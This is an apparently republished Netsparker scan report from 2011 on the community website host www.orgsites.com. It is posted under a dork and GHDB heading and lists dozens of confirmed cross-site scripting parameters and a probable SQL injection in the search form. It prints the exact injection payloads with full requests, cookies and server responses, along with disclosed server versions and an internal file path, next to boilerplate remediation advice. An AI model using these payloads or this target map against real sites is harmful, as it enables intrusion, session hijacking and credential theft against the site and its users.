XSS, SQL Injection, Cross Site Scripting in www.orgsites.com, CWE-79, CAPEC-86, DORK, GHDB REPORT SUMMARY

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

Loading

Netsparker - Scan Report Summary
TARGET URL
http://www.orgsites.com/favicon.ico
SCAN DATE
5/2/2011 2:56:08 PM
REPORT DATE
5/3/2011 1:03:58 AM
SCAN DURATION
04:18:40

Total Requests

39487

Average Speed

2.54 req/sec.
181
identified
68
confirmed
1
critical
80
informational

DORK TESTS

DORK TESTS
PROFILE
Previous Settings
ENABLED ENGINES
Blind SQL Injection, Boolean SQL Injection, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
CRITICAL
1 %
IMPORTANT
40 %
LOW
15 %
INFORMATION
44 %

VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/ Cookie Not Marked As HttpOnly Yes
/_TOOL_eformH.php3 fname POST Cross-site Scripting Yes
fname POST Cross-site Scripting Yes
/002_Directory.php3 firstN POST Cross-site Scripting Yes
lastN POST Cross-site Scripting Yes
email POST Cross-site Scripting Yes
user POST Cross-site Scripting Yes
passwrd1 POST Cross-site Scripting Yes
passwrd2 POST Cross-site Scripting Yes
MAINurl POST Cross-site Scripting Yes
title POST Cross-site Scripting Yes
street POST Cross-site Scripting Yes
firstN POST Cross-site Scripting Yes
city POST Cross-site Scripting Yes
state POST Cross-site Scripting Yes
zip POST Cross-site Scripting Yes
phone POST Cross-site Scripting Yes
lastN POST Cross-site Scripting Yes
email POST Cross-site Scripting Yes
ccatg POST Cross-site Scripting Yes
dir_name POST Cross-site Scripting Yes
street POST Cross-site Scripting Yes
city POST Cross-site Scripting Yes
ccatg POST Cross-site Scripting Yes
state POST Cross-site Scripting Yes
zip POST Cross-site Scripting Yes
phone POST Cross-site Scripting Yes
body POST Cross-site Scripting No
body POST Cross-site Scripting No
keyw POST Cross-site Scripting No
Password Transmitted Over HTTP Yes
Auto Complete Enabled Yes
[Possible] Internal Path Leakage (*nix) No
/002_Website.php3 firstN POST Cross-site Scripting Yes
firstN POST Cross-site Scripting Yes
lastN POST Cross-site Scripting Yes
email POST Cross-site Scripting Yes
lastN POST Cross-site Scripting Yes
email POST Cross-site Scripting Yes
user POST Cross-site Scripting Yes
passwrd1 POST Cross-site Scripting Yes
passwrd2 POST Cross-site Scripting Yes
title POST Cross-site Scripting Yes
street POST Cross-site Scripting Yes
city POST Cross-site Scripting Yes
state POST Cross-site Scripting Yes
zip POST Cross-site Scripting Yes
phone POST Cross-site Scripting Yes
passwrd1 POST Cross-site Scripting Yes
passwrd2 POST Cross-site Scripting Yes
title POST Cross-site Scripting Yes
street POST Cross-site Scripting Yes
city POST Cross-site Scripting Yes
state POST Cross-site Scripting Yes
zip POST Cross-site Scripting Yes
phone POST Cross-site Scripting Yes
ccatg POST Cross-site Scripting Yes
dir_name POST Cross-site Scripting Yes
body POST Cross-site Scripting No
body POST Cross-site Scripting No
body POST Cross-site Scripting No
[Possible] Internal Path Leakage (*nix) No
/al/wiregrassmarines/ [Possible] Internal Path Leakage (*nix) No
/az/mcl-tsn-007/ [Possible] Internal Path Leakage (*nix) No
/az/mcl-tsn-007/index.html [Possible] Internal Path Leakage (*nix) No
/ca/byebyebirdies/ [Possible] Internal Path Leakage (*nix) No
/ca/byebyebirdies/index.html [Possible] Internal Path Leakage (*nix) No
/ca/caf-socal/C46History.htm MS Office Information Disclosure No
/ca/jamestownpto/ [Possible] Internal Path Leakage (*nix) No
/ca/jamestownpto/index.html [Possible] Internal Path Leakage (*nix) No
/ca/pcrs/ [Possible] Internal Path Leakage (*nix) No
/co/pfqg/ [Possible] Internal Path Leakage (*nix) No
/fl/alphagamma/ [Possible] Internal Path Leakage (*nix) No
/fl/classiccrimsoncruisers/ [Possible] Internal Path Leakage (*nix) No
/fl/pelicannest/ [Possible] Internal Path Leakage (*nix) No
/fl/troop359/ [Possible] Internal Path Leakage (*nix) No
/ga/projectlinus/ [Possible] Internal Path Leakage (*nix) No
/ga/projectlinus/index.html [Possible] Internal Path Leakage (*nix) No
/ga/troop88/ MS Office Information Disclosure No
/ia/cvcega/_pgg3.php3 MS Office Information Disclosure No
/ia/cvcega/_pgg5.php3 MS Office Information Disclosure No
/ia/cvcega/_pgg6.php3 MS Office Information Disclosure No
/ia/cvcega/_pgg7.php3 MS Office Information Disclosure No
/ia/cvcega/_pgg8.php3 MS Office Information Disclosure No
/ia/troop188/ [Possible] Internal Path Leakage (*nix) No
/ia/troop188/index.html [Possible] Internal Path Leakage (*nix) No
/in/aurora1stpresby/ [Possible] Internal Path Leakage (*nix) No
/in/aurora1stpresby/index.html [Possible] Internal Path Leakage (*nix) No
/in/fwia/ [Possible] Internal Path Leakage (*nix) No
/in/hopewellpres/ [Possible] Internal Path Leakage (*nix) No
/index.html keyw POST [Probable] SQL Injection No
neighborhood POST Cross-site Scripting Yes
SRCname POST Cross-site Scripting Yes
gcity POST Cross-site Scripting Yes
gstate POST Cross-site Scripting Yes
keyw POST Cross-site Scripting Yes
neighborhood POST Cross-site Scripting Yes
neighborhood POST Cross-site Scripting Yes
keyw POST Cross-site Scripting Yes
neighborhood POST Cross-site Scripting Yes
gstate POST Cross-site Scripting Yes
gcity POST Cross-site Scripting Yes
SRCname POST Cross-site Scripting Yes
keyw POST Database Error Message No
keyw POST Programming Error Message No
[Possible] Internal Path Leakage (*nix) No
/ks/needlinfools/_pgg1.php3 MS Office Information Disclosure No
/ks/pack519-wichita/ [Possible] Internal Path Leakage (*nix) No
/la/pack16/ [Possible] Internal Path Leakage (*nix) No
/ma/wtsc/_pgg10.php3 MS Office Information Disclosure No
/ma/wtsc/_pgg5.php3 MS Office Information Disclosure No
/md/church-crafts-and-activities/_modules.html Weak Credentials Identified No
/md/church-crafts-and-activities/_pgg2.php3 [Possible] Internal Path Leakage (*nix) No
/md/church-crafts-and-activities/editpage.php3 Basic Authorisation over Clear Text Yes
/md/laplatalions/ [Possible] Internal Path Leakage (*nix) No
/md/thetachapter/ [Possible] Internal Path Leakage (*nix) No
/mi/concert-choir/ [Possible] Internal Path Leakage (*nix) No
/mi/westgodwinpto/ [Possible] Internal Path Leakage (*nix) No
/mn/firstbaptistchurch/ [Possible] Internal Path Leakage (*nix) No
/mn/getinvolvedaurora/ [Possible] Internal Path Leakage (*nix) No
/mn/getinvolvedaurora/index.html [Possible] Internal Path Leakage (*nix) No
/mo/hillsboro-mothers-club/_pgg7.php3 MS Office Information Disclosure No
/mo/pack-446/ [Possible] Internal Path Leakage (*nix) No
/mo/swmo-sfo/ [Possible] Internal Path Leakage (*nix) No
/mo/swmo-sfo/index.html [Possible] Internal Path Leakage (*nix) No
/mo/war-no-more/ [Possible] Internal Path Leakage (*nix) No
/mo/war-no-more/index.html [Possible] Internal Path Leakage (*nix) No
/nc/troop525bsa/ [Possible] Internal Path Leakage (*nix) No
/nc/troop525bsa/index.html [Possible] Internal Path Leakage (*nix) No
/nc/troop531/ [Possible] Internal Path Leakage (*nix) No
/nd/wf-exchange-club/ [Possible] Internal Path Leakage (*nix) No
/nd/wf-exchange-club/index.html [Possible] Internal Path Leakage (*nix) No
/ny/rjo-pfo/ [Possible] Internal Path Leakage (*nix) No
/ny/southcountrypta/ [Possible] Internal Path Leakage (*nix) No
/ny/wcctfbc/ [Possible] Internal Path Leakage (*nix) No
/ny/wcctfbc/_pgg10.php3 MS Office Information Disclosure No
/ny/wcctfbc/_pgg7.php3 MS Office Information Disclosure No
/ny/wcctfbc/_pgg8.php3 MS Office Information Disclosure No
/ny/wcctfbc/_pgg9.php3 MS Office Information Disclosure No
/ny/wcctfbc/index.html [Possible] Internal Path Leakage (*nix) No
/oh/deltakappagamma-oh-phi/ [Possible] Internal Path Leakage (*nix) No
/ok/troop553/ [Possible] Internal Path Leakage (*nix) No
/ok/troop553/index.html [Possible] Internal Path Leakage (*nix) No
/ok/unity-wellness-team/ [Possible] Internal Path Leakage (*nix) No
/or/newhope/ [Possible] Internal Path Leakage (*nix) No
/or/tukwilahoa/neighbor.htm MS Office Information Disclosure No
/or/tukwilahoa/officeinfo.htm MS Office Information Disclosure No
/or/tukwilahoa/recrules.htm MS Office Information Disclosure No
/or/tukwilahoa/tukwilaboard.htm MS Office Information Disclosure No
/or/tukwilahoa/TukwilaFREErental.htm MS Office Information Disclosure No
/pa/ Forbidden Resource Yes
/pa/bsatroop150orefield/ [Possible] Internal Path Leakage (*nix) No
/pa/bsatroop150orefield/index.html [Possible] Internal Path Leakage (*nix) No
/pa/carsonvillefire/index.html [Possible] Internal Path Leakage (*nix) No
/pa/generation-s Apache Version Disclosure No
PHP Version Disclosure No
OpenSSL Version Disclosure No
Apache Module Version Disclosure No
/pa/generation-s/ E-mail Address Disclosure No
/pa/halifaxems/index.html [Possible] Internal Path Leakage (*nix) No
/pa/hazletonpack790/ [Possible] Internal Path Leakage (*nix) No
/pa/newhorizons/ [Possible] Internal Path Leakage (*nix) No
/pa/pack32/ [Possible] Internal Path Leakage (*nix) No
/pa/troop267bsa/ [Possible] Internal Path Leakage (*nix) No
/pa/troop55127/ [Possible] Internal Path Leakage (*nix) No
/pa/troop62/ [Possible] Internal Path Leakage (*nix) No
/pa/wigs/ [Possible] Internal Path Leakage (*nix) No
/sc/millennium/ [Possible] Internal Path Leakage (*nix) No
/tn/529/ [Possible] Internal Path Leakage (*nix) No
/tn/bsatroop157/ [Possible] Internal Path Leakage (*nix) No
/tn/troop503/ [Possible] Internal Path Leakage (*nix) No
/tn/venturing/index.html [Possible] Internal Path Leakage (*nix) No
/tn/venturingcrew125/ [Possible] Internal Path Leakage (*nix) No
/tn/venturingcrew125/index.html [Possible] Internal Path Leakage (*nix) No
/tx/pack39/ [Possible] Internal Path Leakage (*nix) No
/tx/robertekattnerpost582americanlegion/ [Possible] Internal Path Leakage (*nix) No
/va/ebbtidebeach/ [Possible] Internal Path Leakage (*nix) No
/va/ravishingreds/ [Possible] Internal Path Leakage (*nix) No
/wa/vipers/ [Possible] Internal Path Leakage (*nix) No
/wa/vipers/index.html [Possible] Internal Path Leakage (*nix) No
/wv/showhorses/ [Possible] Internal Path Leakage (*nix) No
[Probable] SQL Injection

[Probable] SQL Injection

1 TOTAL
CRITICAL
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Even though Netsparker believes that there is a SQL Injection in here it could not confirm it. There can be numerous reasons for Netsparker not being able to confirm this. We strongly recommend investigating the issue manually to ensure that it is an SQL Injection and that it needs to be addressed. You can also consider sending the details of this issue to us, in order that we can address this issue for the next time and give you a more precise result.

Impact

Depending on the backend database, database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL) within the architecture consider its benefits and implement if appropriate. As a minimum the use of s DAL will help centralize the issue and its resolution. You can also use an ORM (object relational mapping). Most ORM systems use parameterized queries and this can solve many if not all SQL Injection based problems.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries)
  4. Monitor and review weblogs and application logs in order to uncover active or previous exploitation attempts.

Remedy

A very robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to test for SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

- /index.html

/index.html

http://www.orgsites.com/index.html

Parameters

Parameter Type Value
FullSearch POST GO
gcity POST 3
gstate POST ALL
keyw POST '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
neighborhood POST ALL
sts POST E

Request

POST /index.html HTTP/1.1
Referer: http://www.orgsites.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.orgsites.com
Cookie: idV[33741]=850614471; idV[49035]=1819662969; idV[54622]=1470334296; idV[52895]=643587439; idV[48945]=1693390705; idV[47313]=305822373; idV[1911]=1650887235; idV[50350]=1848186732; idV[50023]=1244575100; idV[28256]=634765200; idV[50522]=1188109459; idV[34463]=897324517; idV[34546]=263065073; idV[34964]=1177416072; idV[35310]=1277277378; idV[40329]=1594343500; idV[43800]=1032077503; idV[38440]=233593925; idV[44345]=2105004117; idV[47371]=301324675
Content-Length: 237
Accept-Encoding: gzip, deflate

FullSearch=GO&gcity=3&gstate=ALL&keyw='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&neighborhood=ALL&sts=E

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 15:19:35 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
X-Powered-By: PHP/4.1.2
Set-Cookie: idVistor[3]=1157169596; expires=Tue, 03-May-11 15:19:36 GMT; path=/; domain=.orgsites.com
Transfer-Encoding: chunked
Content-Type: text/html


<!--added html xmlns below on 12-03-10--><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" /><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" /><head><meta name="description" content="FREE websites and registry for organizations groups clubs teams, we help you create a free website which lists your events on Global Neighborhood Orgsites Registry Directory of Organizations with internal search engine"><meta name="keywords" content="Free websites,Registry Directory of Organizations,teams, members,organization management,clubs,groups,associations, search engine,events,global neighborhood,orgsites.com"><title>Free websites and registry directory for organizations or groups plus internal search engine for Global Neighborhood Orgsites free websites</title><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><meta http-equiv="Content-type" content="text/html; charset=iso-8859-1" /><meta http-equiv="pragma" content="no-cache" /><meta name="robots" content="Index,Follow" /><style type="text/css"><!--a:link {color :#800000; font-family:arial,helvetica; text-decoration:underline;}a:active {color :#660000; font-family:arial,helvetica; text-decoration:underline;}a:visited {color :#800000; font-family:arial,helvetica; text-decoration:underline;}a:hover {color :Chocolate; font-family:arial,helvetica; text-decoration:underline;}--></style><script type="text/javascript" language="javascript">// <![CDATA[function OpenWindowE(url, name){ popupWin = window.open(url, name, 'noscroll,width=300,height=350,left=50,top=50')}//01-30-11: change window parms to make it largerfunction OpenWindowJ(url, name){//01-30-11 popupWin = window.open(url, name, 'scrollbars,width=490,height=480,left=10,top=0') popupWin = window.open(url, name, 'scrollbars=1,toolbar=1,resizable=1,width=600,height=400,left=20,top=20')}function OpenWindowM(url, name){ popupWin = window.open(url, name, 'noscroll,status,width=380,height=245,left=50,top=50')}function OpenWindowT(url, name){ popupWin = window.open(url, name, 'scrollbars,width=300,height=400,left=20,top=20')}// ]]> </script></head><body bgcolor="#ffffcc" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" text="#003333" link="#800000" vlink="#800000" alink="#660000"><a name="top"><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td width="176" align="left" valign="top" rowspan="2" bgcolor="#FFFFFF"><map name="OrgSite"><area shape="RECT" coords="15,13,175,59" href="index.html"></map><img src=images/logo2.gif width="176" height="182" border="0" usemap="#OrgSite" alt="OrgSites"><img src=images/join2.gif width="176" height="20" alt="Join Now!" border="0" align="top"><table width="176" cellpadding="4" cellspacing="0" border="0"><tr valign="top"><td width="4" valign="top"><img src=images/s.gif width="4" height="1" border="0" alt="s.gif"></td><td valign="top"><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#d27a2b"><!--_leftT.html Start-->
<a href=javascript:OpenWindowJ('002_Website.php3','')>
<img src=../images/tri_white.gif width="9" height="10" border="0" alt="tri_white.gif">
<b><font size="1"> WEBSITE</a>:</b> <br />(Create your site)
<br />
<a href=javascript:OpenWindowJ('002_NewsBar.php3','')>
<img src=../images/tri_white.gif width="9" height="10" border="0" alt="tri_white.gif"> NEWSBAR</a>: <br />(Create your newsbar)
<br />
<a href=javascript:OpenWindowJ('002_Directory.php3','')>
<img src=../images/tri_white.gif width="9" height="10" border="0" alt="tri_white.gif">�DIRECTORY ENTRY</a>: <br/>(Don't need a website but want to be in the OrgSites Directory)
<br clear="all" />
<img src=../images/s.gif width="120" height="2" border="0" alt="s.gif">
Click on your choice.<br clear="all" />
You'll be on-line in minutes. Questions?<br />Read our <a href=http://www.orgsites.com/index.html?page=5>FAQs</a>.
</font>
<!--_leftT.html End--></td><td>&nbsp;&nbsp;</td></tr></table><br /><form action="index.html" method="POST"><table width="176" cellpadding="0" cellspacing="0" border="0"><tr><td>&nbsp;</td><td width="0" valign="top"><font size="2" face="Verdana, Arial, Helvetica, sans-serif" color="#666633"><b>Search<br>Neighborhood</b><br /></font></td></tr><tr valign="top"><td width="17"><img src=images/s.gif width="17" height="1" border="0" alt="s.gif"></td><td><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#666633">Want to know what's<br />going on in a neighborhood?<br />Enter the zipcode<br>and &quot;Go&quot; find out.<br clear="all" /><img src=images/s.gif width="100" height="5"><br clear="all" />Category:<br /><select name="neighborhood"><option value="ALL">ALL
<option value=ALL>ALL
<option value=Animals>Animals
<option value=Arts_Culture>Arts &amp; culture
<option value=Business>Business
<option value=Computers>Computers
<option value=Disaster>Disaster
<option value=Education>Education
<option value=Environment>Environment
<option value=Ethnic>Ethnic
<option value=Fraternal>Fraternal
<option value=Gov-Politics>Govt. & politics
<option value=Health>Health
<option value=Hobbies>Hobbies
<option value=Religion>Religion
<option value=Service>Service
<option value=Social>Social
<option value=Sports>Sports
<option value=Youth>Youth
<option value=Unique>Unique</font>
</select><br /><input type="radio" name="sts" CHECKED value="E">Events <input type="radio" name="sts" value="Y">Sites<br />Zip code:<br /><input type="text" name="SRCname" value="" size="9"><input type="submit" name="ZipSearch" value="Go!"></td></tr></table><table width="176" cellpadding="0" cellspacing="0" border="0"><tr><td width="16"><img src=images/s.gif width="16" height="1" border="0" alt="s.gif"></td><td><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#006666"><input type="hidden" name="zzzip" value="search"></form><p /></td><td>&nbsp;&nbsp;&nbsp;</td></tr><!--_leftB.php3 Start-->
<!-- Talk to us section -->
<tr>
<td width="16"><img src=images/s.gif width="16" height="1" border="0" alt="s.gif"></td>
<td valign="top">
<font size="2" face="verdana,arial,helvetica" color="#666633">
<a href=javascript:OpenWindowE('_TOOL_eformH.php3?mailus=Mail','')>
<b>Talk to Us...</b></a><br /></font>
<font size="1" face="verdana,arial,helvetica" color="#666633">
Send us your questions or comments about your OrgSite. We really value your input, as it helps us prioritize our improvements.<p />
</td>
<td>����</td>
</tr>
<!--_leftB.php3 End--></table><!-- =============== end nested left nav table =============== --></td><!-- =============== DATE second column =============== --><td colspan="2" align="right" valign="top" bgcolor="#ffffcc"><img src=images/s.gif width="16" height="2" border="0" alt="s.gif"><br clear="all" /><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#666633">Monday May 02, 2011&nbsp;&nbsp;&nbsp;</font></td></tr><!-- =============== start second row =============== --><tr><td align="left" valign="top" bgcolor="#ffffcc"><table width="100%" cellspacing="0" cellpadding="13" border="0"><tr><td align="left" valign="top" bgcolor="#ffffcc"><!-- =============== start includes =============== --><table cellspacing="0" cellpadding="0" width="100%" border="0"><tr bgcolor="#cccc99"><td align="left"><font size="2" face="Verdana, Arial, Helvetica, sans-serif" color="#ffffcc">&nbsp; <b>All Events This Week:</b></font>&nbsp;<font face="Verdana, Arial, Helvetica, sans-serif" color="#ffffcc" size="2">In 3,In All States</td> <td align="right" valign="top"><img src=images/rcorner.gif width="11" height="11" border="0" alt="rcorner.gif"></td></tr><tr bgcolor="#989868"><td colspan="2" valign="top"><img src=images/s.gif width="360" height="2"></td></tr></table><table border="0" width="100%" cellpadding="0" cellspacing="0"><tr><td align="right" valign="top"><font face="arial" size="1" color="#989868">&nbsp;0 FOUND</font></td></tr></table><table border="0" width="100%" cellpadding="2" cellspacing="0"><tr><td align="left" valign="top"><font face="Arial,Helvetica" color="#000000" size="1"><i>NO EVENTS LISTED</i><p /></td></tr></table><p /><br><b>Warning</b>: Supplied argument is not a valid MySQL result resource in <b>/home/glnorg/cgi-bin/search_full.php3</b> on line <b>255</b><br><p /><!-- =============== end include section =============== --></td></tr></table></td><!-- =============== end nested text table =============== --><!--RightPanel.incl Start--><td width="190" align="left" valign="top" bgcolor="#ffffcc"><!--=============== KEYWORD SEARCH PANEL ===============--><form action="index.html" method="post"><img src=images/s.gif width="174" height="16"><table width="174" cellspacing="0" cellpadding="0" border="0"><tr><td colspan="2" width="174" align="right" valign="top" bgcolor="#cccc99"><img src=images/keyword.gif width="174" height="28" border="0" alt="Keyword Search"></td></tr><tr bgcolor="#ffffcc"><td width="2" align="left" valign="top" bgcolor="#989868"><img src=images/s.gif width="2" height="10" border="0"></td><td><table width="171" cellspacing="0" cellpadding="5" border="0"><tr><td valign="bottom" bgcolor="#cccc99"><font face="verdana,arial,helvetica" size="-2" color="#666633">&nbsp;&nbsp;Keyword:<br />&nbsp;&nbsp;<input type="text" name="keyw" size="15" value="'+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'"><br />&nbsp;&nbsp;Category:<br />&nbsp;&nbsp;<select name="neighborhood"><OPTION value=ALL>ALL<OPTION VALUE="ALL">ALL
<option value=ALL>ALL
<option value=Animals>Animals
<option value=Arts_Culture>Arts &amp; culture
<option value=Business>Business
<option value=Computers>Computers
<option value=Disaster>Disaster
<option value=Education>Education
<option value=Environment>Environment
<option value=Ethnic>Ethnic
<option value=Fraternal>Fraternal
<option value=Gov-Politics>Govt. & politics
<option value=Health>Health
<option value=Hobbies>Hobbies
<option value=Religion>Religion
<option value=Service>Service
<option value=Social>Social
<option value=Sports>Sports
<option value=Youth>Youth
<option value=Unique>Unique</font>
</select><br /><font size="1">&nbsp;&nbsp;State<br />&nbsp;&nbsp;<select name="gstate"><OPTION value=ALL>ALL<OPTION VALUE="ALL">ALL<OPTION VALUE=*>Choose<OPTION VALUE=AL>Alabama<OPTION VALUE=AK>Alaska<OPTION VALUE=AZ>Arizona<OPTION VALUE=AR>Arkansas<OPTION VALUE=CA>California<OPTION VALUE=CO>Colorado<OPTION VALUE=CT>Connecticut<OPTION VALUE=DE>Delaware<OPTION VALUE=DC>D.C.<OPTION VALUE=FL>Florida<OPTION VALUE=GA>Georgia<OPTION VALUE=HI>Hawaii<OPTION VALUE=ID>Idaho<OPTION VALUE=IL>Illinois<OPTION VALUE=IN>Indiana<OPTION VALUE=IA>Iowa<OPTION VALUE=KS>Kansas<OPTION VALUE=KY>Kentucky<OPTION VALUE=LA>Louisiana<OPTION VALUE=ME>Maine<OPTION VALUE=MD>Maryland<OPTION VALUE=MA>Massachusetts<OPTION VALUE=MI>Michigan<OPTION VALUE=MN>Minnesota<OPTION VALUE=MS>Mississippi<OPTION VALUE=MO>Missouri<OPTION VALUE=MT>Montana<OPTION VALUE=NE>Nebraska<OPTION VALUE=NV>Nevada<OPTION VALUE=NH>New Hampshire<OPTION VALUE=NJ>New Jersey<OPTION VALUE=NM>New Mexico<OPTION VALUE=NY>New York<OPTION VALUE=NC>North Carolina<OPTION VALUE=ND>North Dakota<OPTION VALUE=OH>Ohio<OPTION VALUE=OK>Oklahoma<OPTION VALUE=OR>Oregon<OPTION VALUE=PA>Pennsylvania<OPTION VALUE=RI>Rhode Island<OPTION VALUE=SC>South Carolina<OPTION VALUE=SD>South Dakota<OPTION VALUE=TN>Tennessee<OPTION VALUE=TX>Texas<OPTION VALUE=UT>Utah<OPTION VALUE=VT>Vermont<OPTION VALUE=VA>Virginia<OPTION VALUE=WA>Washington<OPTION VALUE=DC>Washington D.C.<OPTION VALUE=WV>West Virginia<OPTION VALUE=WI>Wisconsin<OPTION VALUE=WY>Wyoming</select><br />&nbsp;&nbsp;City:<br /></font>&nbsp;&nbsp;<input type="text" size="15" name="gcity" value="3"><p />&nbsp;&nbsp;<input type="radio" name="sts" CHECKED value="Y">Sites <input type="radio" name="sts" value="E">Events &nbsp;&nbsp;<input type="submit" name="FullSearch" value="GO"></td></tr></table></td></tr><tr><td colspan="2" width="174" align="right" valign="top" bgcolor="#cccc99"><img src=images/bottom.gif width="174" height="11" border="0" alt="bottom.gif"></td></tr></table></form><p /><!--=============== SITES PANEL ===============--><table width="174" cellspacing="0" cellpadding="0" border="0"><tr><td colspan="2" width="174" align="right" valign="top" bgcolor="#cccc99"><img src=images/new.gif width="174" height="28" border="0" alt="New OrgSites"></td></tr><tr bgcolor="#ffffcc"><td width="2" align="left" valign="top" bgcolor="#989868"><img src=images/s.gif width="2" height="10" border="0"></td><td><table width="171" cellspacing="0" cellpadding="5" border="0"><tr><td valign="top" bgcolor="#cccc99"><font face="verdana,arial,helvetica" size="-2"><!--FeaturedSites.html Start--><table border="0" width="100%" cellpadding="2" cellspacing="0"><tr><td align="right" valign="top"><img src=images/tri_q.gif width="9" height="12" border="0" alt="tri_q.gif"></td><td align="left" valign="top"><font face="Verdana,Helvetica" size="1" color="#666633"><a href="md/church-crafts-and-activities" target="_blank">Church Crafts & Activities</a></font><br clear="all" /><font face="verdana,arial,helvetica" size="-2" color="#666633">Religion<br />, </td></tr><tr><td align="right" valign="top"><img src=images/tri_q.gif width="9" height="12" border="0" alt="tri_q.gif"..
Cross-site Scripting

Cross-site Scripting

69 TOTAL
IMPORTANT
CONFIRMED
63
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /index.html

/index.html CONFIRMED

http://www.orgsites.com/index.html

Parameters

Parameter Type Value
neighborhood POST '"--></style></script><script>alert(0x000114)</script>
SRCname POST Smith
sts POST Y
ZipSearch POST Go!
zzzip POST search

Request

POST /index.html HTTP/1.1
Referer: http://www.orgsites.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.orgsites.com
Cookie: idV[33741]=850614471; idV[49035]=1819662969; idV[54622]=1470334296; idV[52895]=643587439; idV[48945]=1693390705; idV[47313]=305822373; idV[1911]=1650887235; idV[50350]=1848186732; idV[50023]=1244575100; idV[28256]=634765200; idV[50522]=1188109459; idV[34463]=897324517; idV[34546]=263065073; idV[34964]=1177416072; idV[35310]=1277277378; idV[40329]=1594343500; idV[43800]=1032077503; idV[38440]=233593925; idV[44345]=2105004117; idV[47371]=301324675
Content-Length: 145
Accept-Encoding: gzip, deflate

neighborhood='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000114)%3c%2fscript%3e&SRCname=Smith&sts=Y&ZipSearch=Go!&zzzip=search

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 15:11:15 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
X-Powered-By: PHP/4.1.2
Set-Cookie: idVistor[3]=2088838875; expires=Tue, 03-May-11 15:11:17 GMT; path=/; domain=.orgsites.com
Transfer-Encoding: chunked
Content-Type: text/html


<!--added html xmlns below on 12-03-10--><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" /><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" /><head><meta name="description" content="FREE websites and registry for organizations groups clubs teams, we help you create a free website which lists your events on Global Neighborhood Orgsites Registry Directory of Organizations with internal search engine"><meta name="keywords" content="Free websites,Registry Directory of Organizations,teams, members,organization management,clubs,groups,associations, search engine,events,global neighborhood,orgsites.com"><title>Free websites and registry directory for organizations or groups plus internal search engine for Global Neighborhood Orgsites free websites</title><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><meta http-equiv="Content-type" content="text/html; charset=iso-8859-1" /><meta http-equiv="pragma" content="no-cache" 